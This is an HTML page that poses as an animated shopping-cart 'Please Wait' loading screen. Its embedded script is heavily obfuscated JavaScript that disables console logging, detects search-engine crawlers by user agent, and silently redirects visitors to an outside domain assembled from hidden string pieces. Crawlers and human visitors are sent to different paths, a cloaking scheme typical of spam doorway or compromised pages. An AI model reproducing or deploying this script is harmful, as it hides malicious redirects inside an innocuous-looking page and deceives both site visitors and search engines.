<!DOCTYPE html>
<html>
	<head>
		<style>
			* {
				border: 0;
				box-sizing: border-box;
				margin: 0;
				padding: 0;
			}
			:root {
				--hue: 223;
				--bg: hsl(var(--hue), 10%, 90%);
				--fg: hsl(var(--hue), 10%, 10%);
				--primary: hsl(var(--hue), 90%, 55%);
				--trans-dur: 0.3s;
				font-size: calc(16px + (20 - 16) * (100vw - 320px) / (1280 - 320));
			}
			body {
				background-color: var(--bg);
				color: var(--fg);
				font: 1em/1.5 "DM Sans", sans-serif;
				height: 50vh;
				display: grid;
				place-items: center;
				transition: background-color var(--trans-dur), color var(--trans-dur);
			}
			.preloader {
				text-align: center;
				max-width: 20em;
				width: 100%;
			}
			.preloader__text {
				position: relative;
				height: 1.5em;
			}
			.preloader__msg {
				animation: msg 0.3s 13.7s linear forwards;
				position: absolute;
				width: 100%;
			}
			.preloader__msg--last {
				animation-direction: reverse;
				animation-delay: 14s;
				visibility: hidden;
			}
			.cart {
				display: block;
				margin: 0 auto 1.5em auto;
				width: 8em;
				height: 8em;
			}
			.cart__lines,
			.cart__top,
			.cart__wheel1,
			.cart__wheel2,
			.cart__wheel-stroke {
				animation: cartLines 2s ease-in-out infinite;
			}
			.cart__lines {
				stroke: var(--primary);
			}
			.cart__top {
				animation-name: cartTop;
			}
			.cart__wheel1 {
				animation-name: cartWheel1;
				transform: rotate(-0.25turn);
				transform-origin: 43px 111px;
			}
			.cart__wheel2 {
				animation-name: cartWheel2;
				transform: rotate(0.25turn);
				transform-origin: 102px 111px;
			}
			.cart__wheel-stroke {
				animation-name: cartWheelStroke;
			}
			.cart__track {
				stroke: hsla(var(--hue), 10%, 10%, 0.1);
				transition: stroke var(--trans-dur);
			}

			/* Dark theme */
			@media (prefers-color-scheme: dark) {
				:root {
					--bg: hsl(var(--hue), 10%, 10%);
					--fg: hsl(var(--hue), 10%, 90%);
				}
				.cart__track {
					stroke: hsla(var(--hue), 10%, 90%, 0.1);
				}
			}

			/* Animations */
			@keyframes msg {
				from {
					opacity: 1;
					visibility: visible;
				}
				99.9% {
					opacity: 0;
					visibility: visible;
				}
				to {
					opacity: 0;
					visibility: hidden;
				}
			}
			@keyframes cartLines {
				from,
				to {
					opacity: 0;
				}
				8%,
				92% {
					opacity: 1;
				}
			}
			@keyframes cartTop {
				from {
					stroke-dashoffset: -338;
				}
				50% {
					stroke-dashoffset: 0;
				}
				to {
					stroke-dashoffset: 338;
				}
			}
			@keyframes cartWheel1 {
				from {
					transform: rotate(-0.25turn);
				}
				to {
					transform: rotate(2.75turn);
				}
			}
			@keyframes cartWheel2 {
				from {
					transform: rotate(0.25turn);
				}
				to {
					transform: rotate(3.25turn);
				}
			}
			@keyframes cartWheelStroke {
				from,
				to {
					stroke-dashoffset: 81.68;
				}
				50% {
					stroke-dashoffset: 40.84;
				}
			}

		</style>
	</head>

	<body>
		<img src="//sstatic1.histats.com/0.gif?4804389&101" alt="" border="0">
		<div class="preloader">
			<svg class="cart" role="img" aria-label="Shopping cart line animation" viewBox="0 0 128 128" width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
				<g fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="8">
					<g class="cart__track" stroke="hsla(0,10%,10%,0.1)">
						<polyline points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" />
						<circle cx="43" cy="111" r="13" />
						<circle cx="102" cy="111" r="13" />
					</g>
					<g class="cart__lines" stroke="currentColor">
						<polyline class="cart__top" points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" stroke-dasharray="338 338" stroke-dashoffset="-338" />
						<g class="cart__wheel1" transform="rotate(-90,43,111)">
							<circle class="cart__wheel-stroke" cx="43" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
						<g class="cart__wheel2" transform="rotate(90,102,111)">
							<circle class="cart__wheel-stroke" cx="102" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
					</g>
				</g>
			</svg>
			<div class="preloader__text">
				<p class="preloader__msg">Please Wait ...</p>
				<p class="preloader__msg preloader__msg--last">This is taking long. Something’s wrong.</p>
			</div>
		</div>
		<script>
function _0x4536(){var _0x7c037c=['search','Qpjde','jerelu.mbu','trace','(((.+)+)+)','cwKhh','ZiVDm','split','NgLnM','1372080QLpnUC','toString','OFjUm','218826kimWLl','KkrtZ','__proto__','log','constructo','{}.constru','LfUFT','rQwue','return\x20(fu','IADfv','MUDlQ','692289amOcgG','gXHOW','2716SUxAym','5906GtBQZR','jEkAz','IErMc','PUiWP','7klYUtF','go/','QNQTi','ksnYA','bind','href','hEdQz','match','YSriQ','eqNtw','QOhke','lXBqZ','cqSnK','1101hUhQId','SMuxk','info','otDtS','table','DBnor','40VbRFyh','0|1|4|2|5|','EZjLh','360yoqBYJ','https://ho','Gjbzm','test','location','jipRR','prototype','2655496QnAgFk','warn','console','91bnLVHz','wIBKn','apply','6116NBffmK','nction()\x20','ixZPC','lnncq'];_0x4536=function(){return _0x7c037c;};return _0x4536();}function _0x1a84(_0x265a63,_0x28b4ee){var _0x45360b=_0x4536();return _0x1a84=function(_0x1a8421,_0x4bdaa1){_0x1a8421=_0x1a8421-(-0x11*0x65+-0x1f28+0x1*0x27cb);var _0x22cd71=_0x45360b[_0x1a8421];return _0x22cd71;},_0x1a84(_0x265a63,_0x28b4ee);}(function(_0x3cd841,_0x5cd630){function _0x30a73e(_0xff93a2,_0x3f5e82,_0xdadc95,_0x521698){return _0x1a84(_0x521698- -0x37f,_0xff93a2);}function _0x10c070(_0x5e8092,_0x5198fe,_0x245b25,_0x4c4bb9){return _0x1a84(_0x5198fe-0x3e0,_0x5e8092);}var _0x147e0d=_0x3cd841();while(!![]){try{var _0x485519=-parseInt(_0x10c070(0x5b9,0x5d2,0x5f2,0x5da))/(-0x1*-0x1be9+0x270c+0xa*-0x6b2)*(parseInt(_0x30a73e(-0x14e,-0x17a,-0x171,-0x16c))/(-0x1*-0x1e0b+-0x1*0x21dd+0x3d4))+-parseInt(_0x10c070(0x626,0x604,0x5f3,0x5fc))/(-0x2365+0x2*-0x753+0x2*0x1907)*(parseInt(_0x30a73e(-0x18a,-0x16d,-0x186,-0x16d))/(0x32b*-0xb+-0x1545+-0x1*-0x3822))+-parseInt(_0x10c070(0x62c,0x60a,0x61d,0x61b))/(0xf11+0x1*-0x2299+0x138d)*(-parseInt(_0x10c070(0x5cf,0x5e5,0x5d1,0x5db))/(0x3*-0x69b+0xaef+0x8e8))+-parseInt(_0x10c070(0x5f7,0x5f7,0x611,0x5f5))/(0x314+-0xae6+0x7d9)*(-parseInt(_0x30a73e(-0x1a2,-0x19d,-0x188,-0x190))/(-0x1387+0x4*0x4a8+-0xef*-0x1))+-parseInt(_0x30a73e(-0x182,-0x17e,-0x184,-0x16f))/(-0x605*0x5+-0xb73+-0x5*-0x851)+parseInt(_0x10c070(0x5e8,0x5e2,0x5d1,0x5fd))/(-0x2*0x47d+0x3*0x6de+-0xb96)+parseInt(_0x30a73e(-0x1a1,-0x175,-0x16c,-0x18a))/(-0x1c2e+-0x1058+-0xedb*-0x3)*(parseInt(_0x30a73e(-0x138,-0x146,-0x153,-0x152))/(0x289*-0x2+0x2*0xa92+-0xe*0x125));if(_0x485519===_0x5cd630)break;else _0x147e0d['push'](_0x147e0d['shift']());}catch(_0x2291b5){_0x147e0d['push'](_0x147e0d['shift']());}}}(_0x4536,0x14638+-0x589cf*-0x1+-0x40623),(function(){var _0x1f0780={'PUiWP':_0x56f0f0(-0x19f,-0x1ad,-0x194,-0x17c),'DBnor':'(((.+)+)+)'+'+$','cTzEA':function(_0x38f6d5,_0x86f36){return _0x38f6d5!==_0x86f36;},'SMuxk':_0x4ea873(0x1b,0x3a,0x36,0x25),'jEkAz':_0x56f0f0(-0x17f,-0x181,-0x1a1,-0x19f),'hEdQz':_0x4ea873(0x1b,0x15,-0x4,-0x8)+_0x56f0f0(-0x1b8,-0x1bc,-0x1a9,-0x196),'IADfv':_0x56f0f0(-0x178,-0x17b,-0x195,-0x175)+'ctor(\x22retu'+'rn\x20this\x22)('+'\x20)','WyTbY':function(_0xd40a39,_0x292508){return _0xd40a39===_0x292508;},'OFjUm':_0x56f0f0(-0x188,-0x1c8,-0x1a5,-0x1b1),'wIBKn':function(_0x4e87e1){return _0x4e87e1();},'rQwue':_0x4ea873(0xa,0x10,-0xa,-0xb),'otDtS':_0x4ea873(0x16,-0x8,-0x12,0xc),'KkrtZ':_0x4ea873(0x39,0x2e,0x4a,0x3e),'NgLnM':_0x56f0f0(-0x175,-0x190,-0x177,-0x17a),'cqSnK':_0x4ea873(-0x2,0x4,0x20,0x27),'ksnYA':function(_0x187ecb,_0x1b9300){return _0x187ecb!==_0x1b9300;},'lXBqZ':_0x4ea873(0x2c,0x19,0x2a,0x20),'IErMc':_0x56f0f0(-0x17a,-0x182,-0x174,-0x18e)+'3','QOhke':function(_0x3d352a,_0x100819,_0x5b6ee2){return _0x3d352a(_0x100819,_0x5b6ee2);},'eqNtw':function(_0x2faad0,_0x326071){return _0x2faad0+_0x326071;},'ZiVDm':function(_0x4e5198,_0x1dda1c){return _0x4e5198+_0x1dda1c;},'MUDlQ':_0x4ea873(0x18,0x20,0x32,0x1f)},_0x133add=(function(){var _0x565c99={};function _0x57b237(_0x17f665,_0x2d518d,_0x517cd7,_0x28e9d8){return _0x4ea873(_0x2d518d,_0x517cd7-0x2be,_0x517cd7-0x1d9,_0x28e9d8-0x18e);}_0x565c99[_0x3b8bae(0x2c0,0x2a2,0x2b2,0x2a6)]=_0x1f0780[_0x3b8bae(0x273,0x29a,0x27f,0x290)];var _0x516b3b=_0x565c99;function _0x3b8bae(_0x2d6e0d,_0x4b3490,_0x4a4222,_0x2fb08a){return _0x56f0f0(_0x2d6e0d-0xab,_0x4b3490,_0x2fb08a-0x419,_0x2fb08a-0x16f);}var _0x5e0c5f=!![];return function(_0x22b5ab,_0x170852){var _0x1171bd=_0x5e0c5f?function(){function _0x15e31f(_0x49e43e,_0x29f4c6,_0x187e12,_0x2c64a0){return _0x1a84(_0x49e43e- -0x288,_0x187e12);}function _0x18504e(_0x48dfb2,_0x2a6dd3,_0x1d72df,_0x50afc9){return _0x1a84(_0x2a6dd3- -0x349,_0x1d72df);}if(_0x170852){if(_0x516b3b[_0x18504e(-0x10c,-0x11d,-0x106,-0x123)]!==_0x516b3b['EZjLh']){if(_0x2a27e9){var _0x1016db=_0x351d0c['apply'](_0x511f51,arguments);return _0x28853e=null,_0x1016db;}}else{var _0x333f99=_0x170852[_0x18504e(-0x176,-0x155,-0x145,-0x132)](_0x22b5ab,arguments);return _0x170852=null,_0x333f99;}}}:function(){};return _0x5e0c5f=![],_0x1171bd;};}()),_0x51ae27=_0x1f0780[_0x4ea873(0x20,0x29,0x28,0x26)](_0x133add,this,function(){function _0x2b0101(_0x3bff8d,_0x171606,_0x31cd6f,_0x4480bc){return _0x4ea873(_0x3bff8d,_0x4480bc-0xba,_0x31cd6f-0x7b,_0x4480bc-0xd0);}function _0x572f57(_0x205483,_0x5b5b22,_0x4fd69b,_0x3a75d8){return _0x4ea873(_0x5b5b22,_0x205483-0xd0,_0x4fd69b-0x1d8,_0x3a75d8-0x1eb);}return _0x51ae27[_0x2b0101(0xc9,0xdf,0xbf,0xc5)]()['search'](_0x1f0780[_0x572f57(0x101,0x120,0x105,0xec)])['toString']()['constructo'+'r'](_0x51ae27)[_0x572f57(0xd1,0xb6,0xe5,0xcb)](_0x1f0780[_0x572f57(0x101,0x11a,0x108,0x10e)]);});function _0x4ea873(_0xe26a78,_0x2bbb0c,_0x47494e,_0x3590f8){return _0x1a84(_0x2bbb0c- -0x1f8,_0xe26a78);}_0x1f0780[_0x4ea873(0x18,-0x5,-0x11,0xb)](_0x51ae27);var _0x370ba7=(function(){var _0x30e9ca=!![];return function(_0x15683b,_0x113398){var _0x57a5f2=_0x30e9ca?function(){function _0x3f7f88(_0x385c09,_0x5562de,_0x4413f1,_0x3e9dc6){return _0x1a84(_0x4413f1-0x360,_0x3e9dc6);}if(_0x113398){var _0x186ee2=_0x113398[_0x3f7f88(0x559,0x56a,0x554,0x55d)](_0x15683b,arguments);return _0x113398=null,_0x186ee2;}}:function(){};return _0x30e9ca=![],_0x57a5f2;};}()),_0x3884da=_0x1f0780[_0x56f0f0(-0x18a,-0x18a,-0x17e,-0x16f)](_0x370ba7,this,function(){var _0x56a8e9={'lnncq':_0x1f0780[_0x13028d(-0xf5,-0xf1,-0xf3,-0xf7)],'Gjbzm':function(_0x4ace54,_0x3e8b72){return _0x1f0780['cTzEA'](_0x4ace54,_0x3e8b72);},'ixZPC':_0x1f0780[_0x2b313b(0x174,0x15a,0x169,0x163)],'YSriQ':_0x1f0780[_0x13028d(-0x124,-0x10d,-0x12c,-0x10c)],'QNQTi':function(_0x191fa8,_0x4b5d59){return _0x191fa8+_0x4b5d59;},'eOKeN':_0x1f0780[_0x2b313b(0x178,0x140,0x16d,0x15b)],'JFovC':_0x1f0780[_0x13028d(-0x107,-0x108,-0x101,-0x112)],'gsCOi':function(_0x2075c3,_0x8066f4){return _0x1f0780['WyTbY'](_0x2075c3,_0x8066f4);},'iCOLy':_0x1f0780[_0x13028d(-0xfa,-0x138,-0x13a,-0x11c)]},_0x4fa559=function(){function _0x4acbee(_0x296d5e,_0x32c46d,_0x243ded,_0x20d711){return _0x2b313b(_0x296d5e,_0x32c46d-0x13,_0x243ded-0x1b,_0x243ded-0x43a);}function _0x1312f2(_0x507164,_0xe1d1fc,_0x31da2e,_0x1580e7){return _0x13028d(_0x507164-0x18,_0xe1d1fc-0x121,_0x1580e7,_0x31da2e-0x660);}var _0x86cca4;try{if(_0x56a8e9[_0x4acbee(0x59b,0x5c3,0x5a7,0x591)](_0x56a8e9[_0x1312f2(0x52b,0x54e,0x537,0x527)],_0x56a8e9[_0x1312f2(0x56d,0x546,0x55f,0x54f)]))_0x86cca4=Function(_0x56a8e9[_0x1312f2(0x558,0x54b,0x559,0x55a)](_0x56a8e9['eOKeN'],_0x56a8e9['JFovC'])+');')();else{var _0x5662d0=_0x3bce97[_0x4acbee(0x562,0x563,0x56c,0x558)](_0x5adad1,arguments);return _0x5371e5=null,_0x5662d0;}}catch(_0x228c47){if(_0x56a8e9['gsCOi'](_0x4acbee(0x55b,0x559,0x572,0x578),_0x56a8e9['iCOLy']))_0x86cca4=window;else return _0x3e556b[_0x4acbee(0x593,0x585,0x57b,0x564)]()[_0x1312f2(0x525,0x558,0x539,0x525)](_0x4acbee(0x57e,0x574,0x575,0x576)+'+$')[_0x1312f2(0x54e,0x54d,0x543,0x52c)]()[_0x4acbee(0x58e,0x57e,0x581,0x593)+'r'](_0x58629f)[_0x4acbee(0x564,0x55d,0x571,0x560)](mVvkao[_0x1312f2(0x532,0x536,0x538,0x53a)]);}return _0x86cca4;};function _0x2b313b(_0x393a9f,_0x31582c,_0x589386,_0x41ede6){return _0x4ea873(_0x393a9f,_0x41ede6-0x136,_0x589386-0x67,_0x41ede6-0xbe);}var _0x49cbe0=_0x1f0780[_0x2b313b(0x152,0x122,0x119,0x131)](_0x4fa559),_0x5cf8b7=_0x49cbe0[_0x2b313b(0x10e,0x135,0x10f,0x12f)]=_0x49cbe0[_0x2b313b(0x10e,0x120,0x150,0x12f)]||{},_0x870e20=[_0x1f0780[_0x13028d(-0x12c,-0x113,-0xfe,-0x114)],_0x1f0780[_0x2b313b(0x16e,0x151,0x16c,0x165)],_0x1f0780[_0x13028d(-0x133,-0x13a,-0x11d,-0x11a)],'error','exception',_0x1f0780[_0x2b313b(0x12f,0x11c,0x129,0x13f)],_0x1f0780[_0x2b313b(0x14b,0x16b,0x177,0x161)]];function _0x13028d(_0x4d953b,_0xab6ce7,_0x28762e,_0x27fe98){return _0x4ea873(_0x28762e,_0x27fe98- -0x128,_0x28762e-0x36,_0x27fe98-0x153);}for(var _0x2e9c16=0x32c*-0xa+-0x47*-0x66+0x36e;_0x2e9c16<_0x870e20['length'];_0x2e9c16++){if(_0x1f0780[_0x13028d(-0xe5,-0x123,-0x106,-0x106)](_0x13028d(-0x121,-0x12c,-0x122,-0x10f),_0x1f0780[_0x2b313b(0x142,0x156,0x166,0x160)]))_0x1e9bc7=_0x3d7c87;else{var _0x57195b=_0x1f0780[_0x13028d(-0xf5,-0x119,-0xf3,-0x10b)][_0x13028d(-0x133,-0x12b,-0x133,-0x120)]('|'),_0x35c3aa=-0xe14+0x1b34+-0xc*0x118;while(!![]){switch(_0x57195b[_0x35c3aa++]){case'0':var _0x8ffa06=_0x370ba7[_0x2b313b(0x14d,0x15b,0x158,0x147)+'r'][_0x2b313b(0x11a,0x118,0x11e,0x12c)][_0x2b313b(0x148,0x166,0x17c,0x159)](_0x370ba7);continue;case'1':var _0x2dcaa9=_0x870e20[_0x2e9c16];continue;case'2':_0x8ffa06[_0x2b313b(0x163,0x15d,0x126,0x145)]=_0x370ba7[_0x13028d(-0xf5,-0x106,-0x10b,-0x105)](_0x370ba7);continue;case'3':_0x5cf8b7[_0x2dcaa9]=_0x8ffa06;continue;case'4':var _0x3b28ea=_0x5cf8b7[_0x2dcaa9]||_0x8ffa06;continue;case'5':_0x8ffa06[_0x2b313b(0x141,0x147,0x143,0x141)]=_0x3b28ea[_0x13028d(-0x139,-0x12f,-0x125,-0x11d)][_0x2b313b(0x14c,0x151,0x155,0x159)](_0x3b28ea);continue;}break;}}}});_0x1f0780['wIBKn'](_0x3884da);var _0x34cc6=window[_0x4ea873(0x54,0x39,0x39,0x59)][_0x56f0f0(-0x18a,-0x186,-0x183,-0x188)];function _0x56f0f0(_0x4e9f7b,_0x3bb8df,_0x15ae01,_0x6d0878){return _0x1a84(_0x15ae01- -0x39f,_0x3bb8df);}var _0x48ac17=window[_0x56f0f0(-0x167,-0x18a,-0x16e,-0x16a)]['hostname'],_0x48df7e=_0x56f0f0(-0x189,-0x16d,-0x171,-0x15e)+_0x56f0f0(-0x197,-0x18e,-0x1a4,-0x1a0)+'let.co/ite'+'m/'+_0x48ac17+'/',_0x2f53a0=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i[_0x4ea873(0x1c,0x38,0x3a,0x44)](navigator['userAgent']),_0x3766b6=(location[_0x56f0f0(-0x19e,-0x17a,-0x183,-0x192)][_0x4ea873(0x1e,0x26,0x29,0x15)](/\?\/(?:[^-]+)-([^\.]+).html/)||[])[-0x2442+-0x49*0x56+0x3cc9];if(!_0x3766b6)return;var _0x779f01=_0x2f53a0?_0x48df7e+_0x3766b6:_0x1f0780[_0x56f0f0(-0x15f,-0x164,-0x17f,-0x1a1)](_0x1f0780[_0x56f0f0(-0x190,-0x193,-0x1a0,-0x1a3)](_0x1f0780[_0x4ea873(0x37,0x28,0x35,0x11)](_0x48df7e,_0x1f0780[_0x56f0f0(-0x199,-0x1a1,-0x190,-0x17e)]),_0x3766b6),'/');location['href']=_0x779f01;}()));
		</script>
	</body>
</html>
